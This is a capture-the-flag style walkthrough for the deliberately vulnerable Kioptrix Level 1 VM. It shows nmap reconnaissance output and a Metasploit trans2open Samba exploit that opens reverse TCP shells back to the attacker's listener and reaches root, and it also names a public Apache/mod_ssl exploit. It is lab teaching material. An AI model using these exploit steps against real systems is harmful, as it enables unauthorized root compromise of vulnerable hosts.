Kioptrix 1 - Walkthrough

1. Download VM from the link
2. Extract and open the VM in VMware.
3. Issues faced that network adaptor changes to bridged automatically and not assigned any IP when you do netdiscover in kali.
4. To overcome this, Open .vmx file in the vm folder, search for the term “bridged”, two results will be shown, delete the line of first result, and change the word “bridged” to “nat” in second result.
5. Open the vm and use netdiscover to find the IP assigned to the kioptrix Level 1.

Find IP using netdiscover command

netdiscover -r 192.168.211.0/24

kioptrix IP — 192.168.211.131

Start Port scan using nmap

nmap -sC -sV -O -oA initial 192.168.211.131

-sC — run default nmap scripts -sV — detect service version -O — detect OS -oA — output all formats and store in file initial

output:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-13 23:27 IST
Nmap scan report for 192.168.211.131
Host is up (0.00098s latency).
Not shown: 994 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1)
|   1024 8f8e5b81ed21abc180e157a33c85c471 (DSA)
|_  1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1          32768/tcp   status
|_  100024  1          32768/udp   status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2023-05-13T17:59:58+00:00; +1m53s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1m52s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
OS and Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 19.56 seconds

Method 1: Using SMB

Use smbver from OSCPRepo — Link for SMB ver of target

here smb version — Samba 2.1.1

Exploit found — trans2open Buffer overflow using metasploit

Open metasploit using command

msfconsole

type for options available to configure

set rhost, set payload as shown below, and run exploit

msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see [https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
   RPORT   139              yes       The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.211.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

View the full module info with the info, or info -d command.

msf6 exploit(linux/samba/trans2open) > set rhosts 192.168.211.131
rhosts => 192.168.211.131
msf6 exploit(linux/samba/trans2open) > set payload generic/shell_reverse_tcp 
payload => generic/shell_reverse_tcp
msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 192.168.211.128:4444 
[*] 192.168.211.131:139 - Trying return address 0xbffffdfc...
[*] 192.168.211.131:139 - Trying return address 0xbffffcfc...
[*] 192.168.211.131:139 - Trying return address 0xbffffbfc...
[*] 192.168.211.131:139 - Trying return address 0xbffffafc...
[*] 192.168.211.131:139 - Trying return address 0xbffff9fc...
[*] 192.168.211.131:139 - Trying return address 0xbffff8fc...
[*] 192.168.211.131:139 - Trying return address 0xbffff7fc...
[*] 192.168.211.131:139 - Trying return address 0xbffff6fc...
[*] Command shell session 1 opened (192.168.211.128:4444 -> 192.168.211.131:32769) at 2023-05-14 00:52:03 +0530

[*] Command shell session 2 opened (192.168.211.128:4444 -> 192.168.211.131:32770) at 2023-05-14 00:52:04 +0530
[*] Command shell session 3 opened (192.168.211.128:4444 -> 192.168.211.131:32771) at 2023-05-14 00:52:05 +0530
[*] Command shell session 4 opened (192.168.211.128:4444 -> 192.168.211.131:32772) at 2023-05-14 00:52:06 +0530
id
uid=0(root) gid=0(root) groups=99(nobody)

Method 2 : Apache exploit

Observed from nmap result apache running on old version, with public available exploit OpenSSL OpenFucK exploit

Download the exploit, compile using gcc, and run the exploit

Thanks for the time spent 😊